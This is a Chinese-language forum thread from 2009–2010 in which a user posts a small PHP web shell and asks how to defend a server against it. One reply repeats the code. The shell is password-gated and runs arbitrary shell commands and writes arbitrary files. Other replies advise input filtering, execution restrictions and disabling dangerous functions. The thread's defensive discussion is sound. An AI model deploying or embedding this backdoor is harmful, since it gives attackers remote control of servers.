作者 主題: 關於PHP安全  (閱讀 5581 次)

0 會員 與 1 訪客 正在閱讀本文。

park99

  • 可愛的小學生
  • *
  • 文章數: 1
    • 檢視個人資料
關於PHP安全
« 於: 2009-12-22 03:24 »
因為上次在別論壇看到這種PHP程式 好像有機會會給人家拿來做壞事 :P

就試著把他抵檔看看
可是按照人家說的webshell 防止方式修改PHP.INI內
好像沒效果耶 ???

所以想來請問一下 是我方向錯了 還是跟我講這類型的東西該怎麼防禦呢~~?
因為這樣這程式就可以修改我電腦內任何的檔案 感覺蠻危險的~~
程式碼如下

<html>
<head>
<title>ppas452</title>
</head>
<body>
<form action="" method=POST>

檔案位置:<input type="text" name=file><br>
檔案內容:<input type="text" name=file2><br>
<input type="submit" value=" 執 行 ">
</form>
<?php
if ($_REQUEST[pwd]=="test"){
echo `$_POST[cmd]`;
echo str_replace('\\','/',__FILE__);
$x_x=fOpEn($_POST['file'],'w');
FwRItE($x_x,$_POST['file2']);
@fClOSe($x_x);
}else
echo '<script language="javascript">window.location.replace("about:blank");</script>';
?>
</body>
</html>

請各未給予建議~ 謝謝^^

Yamaka

  • 俺是博士!
  • *****
  • 文章數: 4913
    • 檢視個人資料
    • http://www.ecmagic.com
回覆: 關於PHP安全
« 回覆 #1 於: 2009-12-22 08:12 »
因為上次在別論壇看到這種PHP程式 好像有機會會給人家拿來做壞事 :P

就試著把他抵檔看看
可是按照人家說的webshell 防止方式修改PHP.INI內
好像沒效果耶 ???

所以想來請問一下 是我方向錯了 還是跟我講這類型的東西該怎麼防禦呢~~?
因為這樣這程式就可以修改我電腦內任何的檔案 感覺蠻危險的~~
程式碼如下

<html>
<head>
<title>ppas452</title>
</head>
<body>
<form action="" method=POST>

檔案位置:<input type="text" name=file><br>
檔案內容:<input type="text" name=file2><br>
<input type="submit" value=" 執 行 ">
</form>
<?php
if ($_REQUEST[pwd]=="test"){
echo `$_POST[cmd]`;
echo str_replace('\\','/',__FILE__);
$x_x=fOpEn($_POST['file'],'w');
FwRItE($x_x,$_POST['file2']);
@fClOSe($x_x);
}else
echo '<script language="javascript">window.location.replace("about:blank");</script>';
?>
</body>
</html>

請各未給予建議~ 謝謝^^

先想想是否有用這些函數的必要性, 是否有其他的工具或方式可以取代
如果一定要這樣用, 那請過濾所有上傳到主機的所有任何資料
包括檔名, 字串或數字. 樓主的碼除了 $_REQUEST[pwd] 外
其他資料完全沒過濾, 真的會被打好玩的  :D

Error404

  • 懷疑的國中生
  • **
  • 文章數: 31
    • 檢視個人資料
回覆: 關於PHP安全
« 回覆 #2 於: 2010-04-17 17:55 »
表面上這是一個上傳頁面,其實說穿也可以當作上傳類型後門
通常被攻擊者,拿來當作後門留下使用.
也因為這個上傳頁面格式沒有做任何限制.
可以上傳任意具有攻擊性的"特製腳本".
而攻擊者會這樣做,也是防止自己所寫的shell 被掃毒軟體偵測或者被眼尖的管理者給看出來.
一方面也是怕自己的所"特製的shell"瞬間被秒殺或網站的過濾上傳檢測失敗.

再說這只是個上傳的利用.就和你自己的後台上傳功能沒兩樣.(莫非你要透過php.ini禁止所有上傳?應該也沒人會這樣做.)
;D 既然能被植入這腳本,代表您的網站本身就有其他的漏洞存在了.
對能上傳或用戶能接觸的空間給予相當執行權限.並禁止shell 常使用的函數即可.
當然也不是把shell的能用的函數都給禁止 不然空間會變廢 稿的和單純跑html的空間沒兩樣一些程式都無法正常執行.




« 上次編輯: 2010-04-17 17:59 由 Error404 »